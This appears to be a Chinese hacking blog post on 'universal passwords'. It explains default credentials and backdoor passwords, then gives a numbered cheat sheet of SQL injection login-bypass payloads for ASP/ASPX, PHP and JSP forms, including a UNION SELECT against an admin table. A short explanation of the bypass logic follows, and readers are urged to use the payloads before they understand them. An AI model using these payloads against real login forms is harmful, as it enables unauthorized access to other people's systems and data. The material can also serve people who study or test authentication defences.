万能密码——古老又实用的技巧

0

现在网上所说的万能密码,多指SQL的参数为过滤漏洞导致的密码绕过,如’or’=’or’

但万能密码其实上可分为以下三种:

默认密码

默认密码是系统出厂或者复位时,自动设置的固定字符串。大多数系统自带默认帐号、密码,如TP-LINK路由器的默认帐号、密码均为admin。由于系统管理员的疏忽,默认密码可能会成为万能密码。许多黑客扫描工具正是利用这一点,扫描默认密码,往往能够有一定收获。

内部密码因某种需要,开发者为其产品留下了后门,或者是万能密码,被称为内部密码。内部密码往往是高度保密的,一旦流传出去,后果不堪设想。但由于管理不善等原因,内部密码不免泄露。泄露的内部密码将产生巨大的损失,因此许多公司和开发者已不再选择使用内部密码。

漏洞密码

黑客通过利用开发者失误所造成的漏洞,总结出了进入系统的办法,这样的办法可以被称为是“漏洞密码”。缓冲区溢出漏洞的Exploit程序,就可以被认为是一种漏洞密码。更为流行的漏洞密码是由于SQL注入漏洞引起的。黑客中流传比较广泛的“漏洞密码”应该非“‘ or ”=’”莫属了,在登录时,将‘ or ”=’作为登录密码,在一定情况下,能够成功登录。这就是漏洞密码的威力。

今天主要介绍漏洞密码,这里有一篇收集默认密码的,大家看看,留个印象,rp好的时候很有用。。。去看看默认密码有哪些

然后要开始说SQL万能密码了,大家认真看:

asp aspx万能密码

1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1′ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1

17..admin’ or ‘a’=’a  密码随便

 
PHP万能密码

‘or 1=1/*

User: something
Pass: ‘ OR ‘1’=’1

 

jsp 万能密码

1’or’1’=’1

admin’ OR 1=1/*

 

写了那么多的万能密码进来,还没说原理,看不懂没关系,先会用就行,你慢慢就会懂:

下面我们先来看代码中的SQL查询语句" sql = “select * from Manage_User where UserName='” & name & “‘ And

PassWord='”&encrypt(pwd)&”‘    ”   ,要使这条语句执行为真,我们就要构造一个特殊的用户名,就可绕过程序的验证,进入后台,我们只要在用户名处输入’or ‘x’=’x,密码处随便输入字符,这样上面的SQL语句就变成了sql = “select * from Manage_User where UserName=” or ‘x’=’x’ and PassWord=’Admin'”那么where后的语句转换成逻辑语句后为假(因为用户名为空肯定假啦)or真(x=x如果不是等是的话,你还得去补补数学)and假(密码不可能是Admin吧),通过简单的运算,则最终为真,而SQL语句的查询结果也变成真了,这样大家可能还不怎么听得懂,我换成另一条语句:1′ or1=1 or ‘1’=’1,那么SQL语句就变成了sql = “select * from Manage_User where UserName=’1′ or 1=1 or ‘1’=’1′ andPassWord=’000′”大家知道,在逻辑表达式中’1’是为假,1=1总为真吧,’1’=’1’也为真,而密码我们是随便输入的所以为假,那么where后的语句转换成逻辑语句后为假or真or真and假,最终的运算结果也为真.这些大家自己慢慢的去实践,去体会,相信大家都会搞懂的,大家还可以自己构造一些语句去验证下.

 

 

 

头像

Focus On The Network Information Security.

作者主页 邮箱 微博 腾讯微博 QQ Twitter Facebook Google+

发表评论

您的邮箱不会公开,当您的评论有新的回复时,会通过您填写的邮箱向您发送评论内容。 必填字段 *

返回顶部